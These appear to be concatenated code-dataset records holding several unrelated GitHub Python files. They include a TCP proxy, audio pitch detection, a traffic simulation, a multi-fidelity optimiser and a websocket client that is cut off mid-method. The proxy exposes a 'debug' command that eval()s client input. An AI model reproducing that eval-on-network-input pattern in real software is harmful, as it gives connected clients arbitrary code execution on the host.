self.unauthenticated_sockets.remove(socket)\n\n self.client_sockets.append(socket)\n\n else:\n c = self.socket_wrappers[socket]\n c.tell_err(\"Incorrect.\")\n\n return True # stop the main loop from going on to state n+1\n\n\n ###\n ### STATE: client\n ###\n\n def handle_line_client(self, socket, line):\n assert socket in self.client_sockets\n\n c = self.socket_wrappers[socket]\n\n ln = line\n for f in c.filters:\n try:\n ln = f.from_client(ln)\n except Exception:\n kind, value, t = sys.exc_info()\n logging.error(\"Error applying a client filter: {}\".format(repr(value)))\n logging.error(traceback.format_exc())\n\n if ln is None:\n return\n\n s = line.as_str().replace('\\r\\n', '').replace('\\n', '')\n\n if s[:len(COMMAND_PREFIX)] == COMMAND_PREFIX:\n try:\n if ' ' in s:\n cmd = s[len(COMMAND_PREFIX):s.index(' ')]\n args = s[s.index(' ')+1:]\n else:\n cmd = s[len(COMMAND_PREFIX):]\n args = ''\n\n if cmd in self.client_commands:\n self.client_commands[cmd](args, c)\n else:\n c.tell_err(\"Command `{}' not found.\".format(cmd))\n\n except Exception:\n kind, value, t = sys.exc_info()\n c.tell_err(\"Error during command processing: {}\".format(repr(value)))\n logging.error(\"COMMAND PROCESSING ERROR\\n========================\\n\\n\" + traceback.format_exc())\n\n else:\n c.handle_data(line)\n\n return False # don't continue trying states\n\n def do_client_join(self, args, client):\n \"\"\"Start listening to a server.\"\"\"\n assert type(client) == LocalClient\n\n if args in self.servers:\n if client.subscribedTo is not None:\n client.unsubscribe()\n self.servers[args].subscribe(client)\n client.subscribe(self.servers[args])\n client.tell_ok(\"Subscribed to server `{}'.\".format(args))\n return True\n else:\n client.tell_err(\"No such server `{}'.\".format(args))\n return False\n\n def do_client_connect(self, args, client):\n \"\"\"Start listening to a server and initiate a connection to it.\"\"\"\n assert type(client) == LocalClient\n\n if self.do_client_join(args, client):\n self.start_connection(self.servers[args])\n return True #(ish)\n else:\n return False\n\n def do_client_drop(self, args, client):\n \"\"\"Stop listening to the server, but without actually closing the connection to it.\"\"\"\n assert type(client) == LocalClient\n\n try:\n client.unsubscribe()\n client.tell_ok(\"Stopped listening.\")\n except ValueError:\n client.tell_err(\"Couldn't stop listening to this; it may be silent already.\")\n\n def do_client_debug(self, args, client):\n \"\"\"Supply a Python expression to eval() for debugging purposes.\"\"\"\n assert type(client) == LocalClient\n\n try:\n client.tell_ok(repr(eval(args)))\n except Exception:\n kind, value, t = sys.exc_info()\n client.tell_err(repr(value))\n\n def do_client_help(self, args, client):\n \"\"\"Get help.\"\"\"\n assert type(client) == LocalClient\n\n # Commands can have multiple names, so we collect them in a dictionary ordered by\n # the function they call so that we don't end up displaying the same bit of help\n # many times.\n cmds = {}\n\n for cmd, fn in self.client_commands.items(): # (k, v)\n if fn in cmds:\n cmds[fn].append(cmd)\n else:\n cmds[fn] = [cmd]\n\n for fn, names in cmds.items(): # (k, v)\n client.tell_ok(\"{}: {}\".format(', '.join(names), fn.__doc__ or \"No documentation provided.\"))\n\n def do_client_stop_everything(self, args, client):\n \"\"\"Stop the proxy.\"\"\"\n # This is kind of stupid, isn't it?\n raise KeyboardInterrupt()\n\n ###\n ### MAIN LOOP\n ###\n\n def run(self):\n # I'm not sure how much sense it makes to do this here and not in __init__ but oh well.\n for name, proto in self.cfg['servers'].items(): # (k, v)\n self.servers[name] = RemoteServer(proto['host'], proto['port'], name)\n\n if 'encoding' in proto:\n self.servers[name].encoding = proto['encoding']\n if 'ssl' in proto and proto['ssl'] is True:\n self.servers[name].use_SSL = True\n\n server_filters = self.cfg.get('filter_servers', [])\n try:\n self.servers[name].add_filters(server_filters, self.filter_prototypes)\n self.servers[name].add_filters(proto.get('filters', []), self.filter_prototypes)\n except FilterSpecificationError as e:\n logging.error(\"Error while setting up filters: {}\".format(str(e)))\n\n client_filters = self.cfg.get('filter_clients', [])\n\n try:\n def do_accept(socket, mask):\n logging.info(\"Accepting new client...\")\n\n # When SSL is turned on, this can block waiting for the client to send an SSL handshake.\n # Maybe consider running it in a thread, too? (That's a lot of threading though. And\n # clients are more under our control than remote servers are.)\n try:\n connection, address = socket.accept() # and hope it works\n except ssl.SSLError as e:\n logging.error(\"SSL error in do_accept(): {}\".format(e))\n return\n except Exception:\n kind, val, traceback = sys.exc_info()\n logging.error(\"Error in do_accept(): {}\".format(val))\n return\n\n logging.info(\"Accepted {} from {} (mask={}).\".format(repr(connection), repr(address), repr(mask)))\n\n if cfg.get(\"warn_about_connections\", True):\n self.wall(\"A client has connected from {}.\".format(repr(address)))\n\n self.socket_wrappers[connection] = LocalClient(connection)\n self.unauthenticated_sockets += [connection]\n self.sel.register(connection, selectors.EVENT_READ)\n\n try:\n self.socket_wrappers[connection].add_filters(client_filters, self.filter_prototypes)\n except FilterSpecificationError as e:\n self.socket_wrappers[connection].tell_err(\"Error setting up client filters: {}\".format(str(e)))\n\n server = socket.socket()\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n bind_to_host = self.cfg.get(\"bind_to_host\", BIND_TO_HOST)\n bind_to_port = self.cfg.get(\"bind_to_port\", BIND_TO_PORT)\n if type(bind_to_host) != str:\n logging.error(\"Error: host to bind to must be a string\")\n return\n if type(bind_to_port) != int:\n logging.error(\"Error: port to bind to must be a string\")\n return\n server.bind((bind_to_host, bind_to_port))\n\n server = self.tls_ctx_local.wrap_socket(server, server_side=True)\n\n server.listen(100)\n server.setblocking(False)\n self.sel.register(server, selectors.EVENT_READ)\n\n logging.info(\"Listening.\")\n\n while True:\n events = self.sel.select(timeout = 1)\n\n self.LOCK.acquire()\n\n for key, mask in events:\n s = key.fileobj\n if s == server:\n do_accept(s, mask)\n else:\n if s in self.socket_wrappers:\n ss = self.socket_wrappers[s]\n else:\n raise Exception(\"Read on unregistered socket\")\n break\n\n (lines, eof) = ss.read()\n\n if eof:\n self.sel.unregister(s)\n ss.handle_disconnect()\n for state in self.states:\n if s in state[0]:\n del state[0][state[0].index(s)]\n if s in self.socket_wrappers:\n del self.socket_wrappers[s]\n\n for line in lines:\n for state in self.states:\n if s in state[0]:\n result = state[1](s, line)\n if result:\n break # to next line\n\n self.LOCK.release()\n\n except KeyboardInterrupt:\n logging.info(\"Caught KeyboardInterrupt; quitting...\")\n\n\n###\n### STARTUP / initialization\n###\n\nif __name__ == '__main__':\n cfg = load_json(CONFIG_FILE)\n\n if cfg is None:\n logging.error(\"Must have configuration\")\n exit(1)\n\n proxy = Proxy(cfg)\n\n pluginDir = cfg.get('plugin_directory', \"plugins\")\n plugin_err_fatal = cfg.get('plugin_errors_fatal', True)\n\n plugins = {}\n for P in pkgutil.iter_modules([pluginDir]):\n try:\n plugin = P.name\n m = importlib.import_module(\"{}.{}\".format(pluginDir, plugin))\n m.setup(proxy)\n plugins[plugin] = m\n logging.info(\"Loaded plugin {}\".format(plugin))\n except Exception:\n kind, value, traceback = sys.exc_info()\n logging.error(\"Error loading plugin {}: {}\".format(plugin, repr(value)))\n #print(\"-------------------- TRACEBACK:\")\n #print(traceback.format_exc())\n if plugin_err_fatal:\n raise value\n\n try:\n proxy.run()\n\n except Exception:\n kind, value, t = sys.exc_info()\n logging.error(\"Runtime error: {}\".format(repr(value)))\n traceback.print_exc()\n\n for P in plugins.values():\n try:\n P.teardown(proxy)\n\n except AttributeError:\n pass\n\n except Exception:\n kind, value, t = sys.exc_info()\n logging.error(\"Error unloading plugins: {}\".format(repr(value)))\n traceback.print_exc()\n","repo_name":"autumn-birds/tcphydra-python","sub_path":"core/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":32971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34674429500","text":"import numpy as np\nfrom scipy.signal import argrelmax\nimport time\n\n\n##this file contains various functions\n##for calculating main lobe pitch from a block of audio\n\n\ndef getf0(block):\n #max of fourier\n fourier = abs(np.fft.fft(block, n=len(block),axis=0))[:int(len(block)/2)]\n freqs = np.fft.fftfreq(len(fourier), 1/sample_rate)\n pitch = freqs[np.argmax(fourier)]\n return pitch\n\ndef zerocrossings(block, fs):\n #count number of times signal changes sign\n zero_crossings = np.nonzero(np.diff(np.sign(block)))[0]\n pitch = len(zero_crossings)/len(block)*fs/2\n return pitch\n \ndef autocorrelation(prevblock, block, fs):\n #standard autocorrelation implementation\n autoc = np.correlate(np.concatenate((prevblock,block)).ravel(),\\\n prevblock.ravel(),\\\n mode='valid')\n\n return autoc\n\ndef fastautoc(block, fs):\n #fast autocorrelation trick\n fourier = np.fft.fft(block, n=len(block),axis=0).ravel()\n autoc = np.fft.ifft(np.multiply(fourier,np.conjugate(fourier)),n=len(block),axis=0)\n f = findfreq(autoc, fs)\n return f\n\ndef findfreq(autoc, fs):\n #find main lobe from autocorrelation block\n maxima = argrelmax(autoc[:int(len(autoc)/2)])\n if not autoc.size:\n return 1\n if not maxima:\n return 1\n if not autoc[maxima].any():\n \treturn 1\n peak = maxima[0][np.argmax(autoc[maxima])]\n f = (fs/peak)\n return f\n\ndef avgdiff(prevblock, block):\n n = len(block)\n twoblock = np.append(prevblock, block)\n diff = np.zeros(n)\n for t in range(n):\n for i in range(n):\n diff[t] += np.square(prevblock[i] - twoblock[i + t])\n return diff\n\n\ndef cmnd(prevblock, block):\n #cumulative mean normalized difference function\n start = time.time()\n n = len(block)\n diff = avgdiff(prevblock, block)\n nordiff = np.zeros(n)\n nordiff[0] = 1\n for t in range(1, n):\n nordiff[t] = np.divide(diff[t], np.sum(nordiff)/t)\n print(time.time() - start)\n return nordiff\n \n","repo_name":"omarshayan/tuner","sub_path":"flaskr/pitch_detection.py","file_name":"pitch_detection.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72994677289","text":"from ...synthdefs import SynthDefBuilder\nfrom ...ugens import Out, SinOsc\n\n\ndef _build_synthdef():\n with SynthDefBuilder(amplitude=0, bus=0, frequency=440) as builder:\n Out.ar(\n bus=builder[\"bus\"],\n source=SinOsc.ar(frequency=builder[\"frequency\"]) * builder[\"amplitude\"],\n )\n return builder.build(name=\"simple_sine\")\n\n\nsimple_sine = _build_synthdef()\n\n\n__all__ = [\"simple_sine\"]\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"supriya/assets/synthdefs/simple_sine.py","file_name":"simple_sine.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"73966882088","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sms', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='messagedetails',\n name='message',\n field=models.TextField(default=None, null=True, verbose_name='Message Content', blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"vamshedhar/smschannel-api","sub_path":"sms/migrations/0002_messagedetails_message.py","file_name":"0002_messagedetails_message.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31652354378","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\nimport sys\nread = sys.stdin.read\nreadline = sys.stdin.readline\nreadlines = sys.stdin.readlines\n\nn,m = map(int,readline().split())\nx = list(map(int,readline().split()))\ns = readline().split()[0]\nabc = list(map(int,read().split()))\n\nimport heapq\ndef dijkstra(links, start, n):\n inf = 10**18\n d = [inf] * (n)\n d[start] = 0\n hq = []\n for cost,i in links[start]:\n heapq.heappush(hq, cost*inf + i)\n while(hq):\n num = heapq.heappop(hq)\n cost = num//inf\n i = num%inf\n if( d[i] != inf):\n continue\n d[i] = cost\n for tmp in links[i]:\n cost_next, j = tmp\n if(d[j] == inf):\n heapq.heappush(hq, inf*(cost+cost_next)+j )\n return d\n\nn2 = n + 4\nlinks = [[] for _ in range(n2)]\n\nit = iter(abc)\nfor a,b,c in zip(it,it,it):\n links[a].append((c,b))\n links[b].append((c,a))\n\nfor i,si in enumerate(s,1):\n if(si=='A'):\n links[i].append((x[0], n+2))\n links[i].append((x[1], n+3))\n links[n+1].append((0, i))\n elif(si=='B'):\n links[i].append((x[0], n+1))\n links[i].append((x[2], n+3))\n links[n+2].append((0, i))\n else:\n links[i].append((x[1], n+1))\n links[i].append((x[2], n+2))\n links[n+3].append((0, i))\n\nd = dijkstra(links, 1, n2)\nprint(d[n])","repo_name":"komajun365/competitive_programming","sub_path":"past/past202010-open/j/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32942311562","text":"# А теперь преобразовать наши методы для колеса, дворника и салона на новые:\n# Заменить одно колесо или несколько\n# Заменить один дворник или несколько\n# Заменить одно кресло в салоне или несколько\n# А также написать метод, который принимает список именованных аргументов с новыми значениями\n# и вызывает сеттеры для них.\n# Например, если он принимает мотор и коробку передач, то заменить имеющийся мотор на новый и коробку передач тоже.\n\n\nclass Auto:\n def __init__(self, color=\"red\", model=\"BMW\", speed=200, wheels=[17, 17, 19, 19],\n wipers=['left', 'broken'], seats=['d', 'p', 'p', 'p', 'p'], motor=\"V8\",\n win=0, transmission=\"automatic\"):\n self.color = color\n self.model = model\n self.speed = speed\n self.wheels = wheels\n self.wipers = wipers\n self.seats = seats\n\n self._motor = motor\n self._win = win\n self._transmission = transmission\n\n def change_color(self, new_color):\n self.color = new_color\n print(\"Color is successfully changed\")\n\n def change_speed(self, new_speed):\n self.speed = new_speed\n print(\"Maximum speed is successfully changed\")\n\n def change_model(self, new_model):\n self.model = new_model\n print(\"Model is successfully changed\")\n\n def change_wheel(self, new_wheel, number):\n self.wheels[number] = new_wheel\n print(f'Wheel #{number + 1} is successfully changed')\n\n def change_wiper(self, new_wiper, number):\n self.wipers[number] = new_wiper\n print(f'Wiper #{number + 1} is successfully changed')\n\n def change_seat(self, new_seat, number):\n self.seats[number] = new_seat\n print(f'Seat #{number + 1} is successfully changed')\n\n def get_motor(self):\n return self._motor\n\n def set_motor(self, new_motor):\n self._motor = new_motor\n\n def get_win(self):\n return self._win\n\n def set_win(self, new_win):\n self._win = new_win\n\n def get_transmission(self):\n return self._transmission\n\n def set_transmission(self, new_transmission):\n self._transmission = new_transmission\n\n def tell(self):\n print(f'Car is {self}')\n print(f'Color is {self.color}')\n print(f'Model is {self.model}')\n print(f'Maximum speed is {self.speed}')\n print(f'Wheels formula is {self.wheels}')\n print(f'Wipers formula is {self.wipers}')\n print(f'Seats formula is {self.seats}')\n print(f'Motor is {self.get_motor()}')\n print(f'Win number is {self.get_win()}')\n print(f'Transmission is {self.get_transmission()}')\n\n\nmy_auto_1 = Auto()\nmy_auto_2 = Auto()\nmy_auto_1.tell()\n\nnew_color = \"yellow\"\nnew_model = \"Jeep\"\nnew_speed = 180\nnew_motor = \"V6\"\nnew_win = 1\nnew_transmission = \"robot\"\nnew_wheel = 19\nnew_wiper = \"right\"\nnew_seat = 'p+'\n\nmy_auto_2.change_color(new_color)\nmy_auto_2.change_model(new_model)\nmy_auto_2.change_speed(new_speed)\n\nmy_auto_2.change_wheel(new_wheel, 0)\nmy_auto_2.change_wheel(new_wheel, 1)\nmy_auto_2.change_wiper(new_wiper, 1)\nmy_auto_2.change_seat(new_seat, 1)\n\nmy_auto_2.set_motor(new_motor)\nmy_auto_2.set_win(new_win)\nmy_auto_2.set_transmission(new_transmission)\n\nmy_auto_2.tell()\n","repo_name":"RBVV23/PythonForKids","sub_path":"Unit 1 - Programming/Lesson_4/Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37351420619","text":"import agentpy as ap\nfrom semaforo_c import SemaforoCarro\nfrom semaforo_p import SemaforoPeaton\nfrom carro import Carro\n\n# Para el tiempo\nimport time\nt = 0\nelapsed_time = 0\n\n# Importamos JSON\nimport json\n# Posiciones en formato JSON\nsteps = []\njsonFile = {}\ncurrentPos = {}\n\nclass StreetModel(ap.Model):\n\n def setup(self):\n\n # Arreglos para las posiciones de los semáforos\n semaforos_carros = []\n semaforos_peatones = []\n\n # Tiempo de cambio de los semáforos\n self.tiempo = self.p.tiempo\n\n \"\"\" Inicializamos los agentes \"\"\"\n self.n_carros = self.p.carros\n self.carros = ap.AgentList(self, self.n_carros, Carro)\n\n n_semaforo_carros = self.p.semaforo_carros\n self.semaforo_carros = ap.AgentList(self, n_semaforo_carros, SemaforoCarro)\n\n n_semaforo_peatones = self.p.semaforo_peatones\n self.semaforo_peatones = ap.AgentList(self, n_semaforo_peatones, SemaforoPeaton)\n\n \"\"\" Creamos el grid del cruce \"\"\"\n size = self.p.size\n self.cruce = ap.Grid(self, [size] * 2, track_empty = True)\n\n \"\"\" Agregamos a los agentes de tipo Carro \"\"\"\n # Definimos la posición de los agentes dentro del Grid\n self.cruce.add_agents(self.carros, [\n (-3, -95), \n (3, -95),\n (-3, -120),\n (3, -142),\n (-3, -145),\n (3, -172),\n (95, 3),\n (95, -3),\n (110, -3),\n (136, 3),\n (152, -3)\n ])\n # Definimos la posisición de los carros para mandarlo a Unity\n # Para avanzar[0 - 5] -> z++, [6 - 10] -> x++\n # -3 -120\n x_carro = [-3, 3, -3, 3, -3, 3, 95, 95, 110, 136, 152]\n z_carro = [-95, -95, -120, -142, -145, -172, 3, -3, -3, 3, -3]\n for i in range(self.n_carros):\n self.carros[i].x = x_carro[i]\n self.carros[i].y = 0\n self.carros[i].z = z_carro[i]\n\n\n \"\"\" Agregamos a los agentes de tipo Semaforos \"\"\"\n # Lo asignamos en posiciones específicas en el grid\n self.cruce.add_agents(self.semaforo_carros, [\n (-7, 7),\n (7, -7)\n ])\n # Definimos a uno de los semáforos como detenido, o Rojo\n self.semaforo_carros[0].status = 0\n\n self.cruce.add_agents(self.semaforo_peatones, [\n (-6, -7),\n (6, 7)\n ])\n # Definimos la posición de los semaforo para mandarlo a Unity\n x_semaforo_carro = [-7, 7]\n z_semaforo_carro = [7, -7]\n x_semaforo_peatones = [-6, 6]\n z_semaforo_peatones = [-7, 7]\n\n # Añadimos la posicións de los carros\n for i in range(n_semaforo_carros):\n self.semaforo_carros[i].x = x_semaforo_carro[i]\n self.semaforo_carros[i].y = 0\n self.semaforo_carros[i].z = z_semaforo_carro[i]\n\n semaforo = {\n \"x\" : x_semaforo_carro[i],\n \"y\" : 0,\n \"z\" : z_semaforo_carro[i]\n }\n semaforos_carros.append(semaforo)\n\n # Añadimos la posición de los semáforos\n for i in range(n_semaforo_peatones):\n self.semaforo_peatones[i].x = x_semaforo_peatones[i]\n self.semaforo_peatones[i].y = 0\n self.semaforo_peatones[i].z = z_semaforo_peatones[i]\n\n semaforo = {\n \"x\" : x_semaforo_peatones[i],\n \"y\" : 0,\n \"z\" : z_semaforo_peatones[i]\n }\n semaforos_peatones.append(semaforo)\n\n\n step = {\n \"semaforos_carros\": semaforos_carros,\n \"semaforos_peatones\": semaforos_peatones\n }\n stepInicial = {\n \"posicion_inicial\": step\n }\n jsonFile.update(stepInicial)\n\n def step(self): \n # Añadimos las variables para el tiempo\n global t\n global elapsed_time\n if (t == 0):\n # Iniciamos el contador de segundos según inicien los steps\n t = time.time()\n\n # Cada step tiene un arreglo de carros y uno de semaforos\n carros = []\n semaforos_carros = []\n\n # Avanzan hasta que está cerca del semáforo\n for i in range(self.n_carros):\n # EJE Z\n if (i < 6):\n # Si está antes o después del cruce avanza\n if (self.carros[i].z < -18):\n self.carros[i].move_up(0.5)\n \n elif (self.carros[i].z > -12):\n self.carros[i].move_up(1)\n\n # Si el semáforo está en verde, puede avanzar más\n elif (self.semaforo_carros[0].status == 1):\n self.carros[i].move_up(0.5)\n \n # EJE X\n else:\n if (self.carros[i].x > 18):\n self.carros[i].move_left(0.5)\n\n elif (self.carros[i].x < 12):\n self.carros[i].move_left(1)\n\n elif (self.semaforo_carros[1].status == 1):\n self.carros[i].move_left(0.5)\n \n\n # Definimos la posición actual de los carros en un json\n for i in range(self.n_carros):\n carro = {\n \"x\": self.carros[i].x,\n \"y\": self.carros[i].y,\n \"z\": self.carros[i].z\n }\n carros.append(carro)\n for i in range(2):\n semaforo = {\n \"estado\": self.semaforo_carros[i].status\n }\n semaforos_carros.append(semaforo)\n\n\n # Vemos cuanto tiempo pasó #\n elapsed_time = time.time() - t\n\n # Tras cierta cantidad segundos cambian de estado los semáforos\n if (elapsed_time > self.tiempo):\n # Reiniciamos el contador a cero para volver a contar 6 segundos\n t = time.time()\n\n if (self.semaforo_carros[0].status == 1):\n self.semaforo_carros[0].status = 0\n self.semaforo_carros[1].status = 1\n else:\n self.semaforo_carros[0].status = 1\n self.semaforo_carros[1].status = 0\n\n # Añadimos al json las posiciones y los estados\n step = {\n \"carros\": carros,\n \"semaforos_carros\": semaforos_carros\n }\n steps.append(step)\n \n \n \n def end(self):\n steps_json = {\n \"steps\": steps\n }\n jsonFile.update(steps_json)\n self.report('ended', 1) \n\n \nparameters = {\n 'tiempo': 3, # Tiempo de duración de los semáforos\n 'carros': 11, # número de agentes Carro\n 'semaforo_peatones': 2, # número de agentes Semáforos para peatones\n 'semaforo_carros': 2, # número de agentes Semáforos para carros\n 'size': 300, # Largo y alto del grid\n 'steps': 600, # iteraciones\n 'seed': 40,\n}\n\nmodel = StreetModel(parameters)\nresults = model.run()\nprint(results)\n\n# Guardamos el JSON como archivo\njson_object = json.dumps(jsonFile, indent = 4)\nwith open(\"positions.json\", \"w\") as outfile:\n outfile.write(json_object)","repo_name":"ErikJs001/Proyecto-MultiAgentes","sub_path":"StreetModel.py","file_name":"StreetModel.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1025208698","text":"a, b = input().split()\nx, y = int(a), int(b)\nl1 = x\nl2 = y\nr = 0\n\nwhile y != 0:\n r = x % y\n x = y\n y = r\n\nprint(\"numar placi: \", ((l1 * l2) / (x * x)))\nprint(\"dimensiune placi: \", x)","repo_name":"st-lu/University","sub_path":"Programming algorithms - Python/lab1/p3 lab1.py","file_name":"p3 lab1.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34650259918","text":"#!/usr/bin/env python\n\nimport os, sys\nimport pickle\nimport numpy as np\nimport pandas as pd\n\nfrom olympus.surfaces import Surface\nfrom olympus.campaigns import Campaign, ParameterSpace \nfrom olympus.objects import ParameterDiscrete\n\nfrom atlas.planners.multi_fidelity.planner import MultiFidelityPlanner\n\n\n# CONFIG\nSURFACE_KIND = 'Schwefel'\nDIM = 6\nNUM_RUNS = 50\nBUDGET = 30\n\n\nsurface = Surface(kind=SURFACE_KIND, param_dim=DIM)\n\n\n# HELPER FUNCTIONS\ndef compute_cost(observations):\n return np.sum(observations.get_params()[:, 0].astype(float))\n\ndef measure(params, s):\n x0 = params.param_0\n x1 = params.param_1\n x2 = params.param_2\n x3 = params.param_3\n x4 = params.param_4\n x5 = params.param_5\n if s == 1.:\n measurement = surface.run([x0,x1,x2,x3,x4,x5])[0][0] # high fidelity\n if s == 0.1:\n measurement = surface.run([x0,x1,x2,x3,x4,x5])[0][0] + 0.5 # low fidelity\n return measurement\n\n\n# BUILD PARAMETER SPACE\nparam_space = ParameterSpace()\nparam_space.add(ParameterDiscrete(name='s', options=[0.1, 1.]))\nfor param in surface.param_space:\n param_space.add(param)\n\n\n# BEGIN EXPERIMENT\n\n\nall_data = []\nfor run_ix in range(NUM_RUNS):\n \n planner = MultiFidelityPlanner(\n goal='minimize',\n fidelity_params=0,\n fidelities=[0.1, 1.],\n acquisition_optimizer_kind='pymoo',\n )\n planner.set_param_space(param_space)\n \n campaign = Campaign()\n campaign.set_param_space(param_space)\n \n target_rec_measurements = []\n \n cumul_cost = []\n max_cumul_cost = 0.\n iter_ = 0\n while max_cumul_cost < BUDGET: \n if iter_ % 4 == 0:\n planner.set_ask_fidelity(1.0)\n else:\n planner.set_ask_fidelity(0.1)\n samples = planner.recommend(campaign.observations)\n for sample in samples:\n\n measurement = measure(sample, sample.s)\n campaign.add_observation(sample, measurement)\n cumul_cost.append( compute_cost(campaign.observations) )\n max_cumul_cost = np.amax(cumul_cost)\n \n iter_ += 1\n \n if campaign.num_obs >= 5+1:\n # make a prediction on the target fidelity and measure greedy\n rec_sample = planner.recommend_target_fidelity(batch_size=1)[0]\n rec_measurement = measure(rec_sample, s=1.0)\n target_rec_measurements.append(rec_measurement)\n \n else:\n # just record the current measurement\n target_rec_measurements.append(measurement)\n \n \n # store results in dataframe\n s_col = campaign.observations.get_params()[:, 0]\n x0_col = campaign.observations.get_params()[:, 1]\n x1_col = campaign.observations.get_params()[:, 2]\n x2_col = campaign.observations.get_params()[:, 3]\n x3_col = campaign.observations.get_params()[:, 4]\n x4_col = campaign.observations.get_params()[:, 5]\n x5_col = campaign.observations.get_params()[:, 6]\n\n obj0 = np.array(target_rec_measurements) #campaign.observations.get_values()\n\n data = pd.DataFrame({\n 'cumul_cost': np.array(cumul_cost),\n 's': s_col,\n 'x0': x0_col,\n 'x2': x2_col,\n 'x3': x3_col,\n 'x4': x4_col,\n 'x5': x5_col,\n 'obj': target_rec_measurements,\n })\n all_data.append(data)\n pickle.dump(all_data, open('mf_cont_high_results.pkl', 'wb'))\n\n\n\n","repo_name":"aspuru-guzik-group/atlas","sub_path":"examples/multi_fidelity/schwefel_6d/run_mf.py","file_name":"run_mf.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"13653128563","text":"from urllib.parse import urlparse\nfrom typing import Union, Type\nfrom os import urandom\n\nfrom zoey.chain import Extension, WSConstructor\nfrom zoey.exceptions import AlreadyClosed, HandshakeFail, NotConnected\nfrom zoey.framing import ControlFrame, Close, ExtensionRsvs, Message, Ping, Pong, Frame, FrameOpcode\nfrom zoey.handshake import WebsocketUpgrade, ServerResponse\nfrom zoey.utils import ConnectionStatus\n\nfrom gevent import spawn\nimport gevent._ssl3 as ssl\nimport gevent._socket3 as socket\n\n\nclass Client:\n\n WS_PORT = 80, 443\n MAX_SIZE = (2 ** 64) - 1\n\n def __init__(self, ws_uri: str, *extensions: Type[Extension], origin: str=None,\n host: str=None, context: ssl.SSLContext=None):\n self.uri = urlparse(ws_uri)\n\n if self.uri.scheme not in (\"wss\", \"ws\"):\n raise NotImplementedError(\"Scheme must be either 'wss' or 'ws'.\")\n\n self.extensions = [extension(self) for extension in extensions]\n self.overwrites = {\"origin\": origin, \"host\": host}\n self.status = ConnectionStatus.CLOSED\n self.socket = socket.socket()\n self.constructor = WSConstructor(self)\n if self.is_secure:\n context = context or ssl.create_default_context()\n self.socket = context.wrap_socket(self.socket, server_hostname=host or self.uri.hostname)\n\n self.close_reason = None\n self._connect_greenlet = None\n\n def trigger(self, name: str, *args, **kwargs):\n for extension in self.extensions:\n getattr(extension, name)(*args, **kwargs)\n\n def send_control(self, frame: Type[ControlFrame], **kwargs):\n self.trigger(\"before_control_frame\", frame)\n data = frame.build(**kwargs, extensions=self.extensions)\n self.socket.send(data)\n\n def send_message(self, msg: Union[bytes, str]):\n is_text = isinstance(msg, str)\n if is_text:\n msg = msg.encode(\"utf8\")\n msgs = []\n for chunk in range(0, len(msg), self.MAX_SIZE):\n msgs.append(msg[chunk: chunk + self.MAX_SIZE])\n\n rsvs = [False, False, False]\n for extension in self.extensions:\n for i in range(3):\n rsvs[i] = extension.should_set(i, Frame)\n\n for i, part in enumerate(msgs):\n frame = Frame(\n True if i == len(msgs) - 1 else False,\n ExtensionRsvs(*map(int, rsvs)),\n FrameOpcode.TEXT if is_text else FrameOpcode.BINARY,\n part,\n urandom(4) if not self.is_secure else None\n )\n self.trigger(\"before_frame\", frame)\n self.socket.send(frame.build())\n\n @property\n def is_secure(self) -> bool:\n return self.uri.scheme == \"wss\"\n\n def close(self, code: int=1000, reason: str=None):\n if ConnectionStatus.CONNECTED:\n self.send_control(Close, mask=urandom(4) if not self.is_secure else None, code=code, reason=reason)\n self.status = ConnectionStatus.CLOSING\n elif ConnectionStatus.CONNECTING:\n self.socket.close()\n elif ConnectionStatus.CLOSING:\n self.socket.close()\n else:\n raise AlreadyClosed\n\n def connect(self):\n self.status = ConnectionStatus.CONNECTING\n self.socket.connect((self.uri.hostname, self.WS_PORT[1] if self.is_secure else self.WS_PORT[0]))\n upgrade = WebsocketUpgrade(self.uri, self.extensions, **self.overwrites)\n data = upgrade.build()\n self.socket.send(data)\n response = ServerResponse.load(self.socket)\n if response.code != 101:\n self.close()\n raise HandshakeFail(\"Code: {}\".format(response.code))\n if not upgrade.confirm(response):\n self.close()\n raise HandshakeFail(\"Invalid websocket response\")\n self.status = ConnectionStatus.CONNECTED\n self._connect_greenlet = spawn(self.constructor.start)\n self.trigger(\"on_connection\")\n self.on_connection()\n\n def run_forever(self):\n if self.status != ConnectionStatus.CONNECTING and self.status != ConnectionStatus.CONNECTED:\n raise NotConnected(\"Must connect before running forever.\")\n self._connect_greenlet.join()\n\n def on_connection(self):\n pass\n\n def on_message(self, msg: Message):\n pass\n\n def on_ping(self, 